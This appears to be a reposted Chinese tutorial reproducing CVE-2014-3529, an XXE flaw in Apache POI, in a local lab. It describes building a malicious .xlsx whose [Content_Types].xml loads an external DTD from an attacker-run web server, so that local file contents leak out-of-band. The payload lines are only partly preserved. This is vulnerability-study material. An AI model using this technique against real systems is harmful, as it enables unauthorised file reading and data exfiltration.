栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Java

CVE-2014-3529

Java 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

CVE-2014-3529

一、 漏洞影响

poi-ooxml3.10及以下

二、环境搭建 1. 漏洞环境使用大佬的java靶场:https://github.com/JoyChou93/java-sec-code.git。在C盘下新建1.txt,文件内容为success,用于演示文件读取 2. 使用python起一个web服务用来加载远程dtd文件,在web服务目录下放置一个xxe.dtd
">
%all;

3. 制作包含payload的Excel

新建一个Excel文档xxe.xlsx,修改后缀为zip后解压,解压后的目录结构如下

在[Content_Types].xml中添加payload

 

%dtd; %send;]>

再将所有文件压缩成zip,修改后缀为xlsx

三、漏洞复现 1. 访问靶场127.0.0.1:8080/ooxml/upload 2. 上传xxe.xlsx文件

5. web服务器端可以通过访问记录看到xxe执行的结果

四、其他 1. 文件读取外带数据只能带单行数据,所以没有读取win.ini 2. 3.13版本测试不存在漏洞,网上的应该只是官网的一个演示用例存在漏洞
转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/750017.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号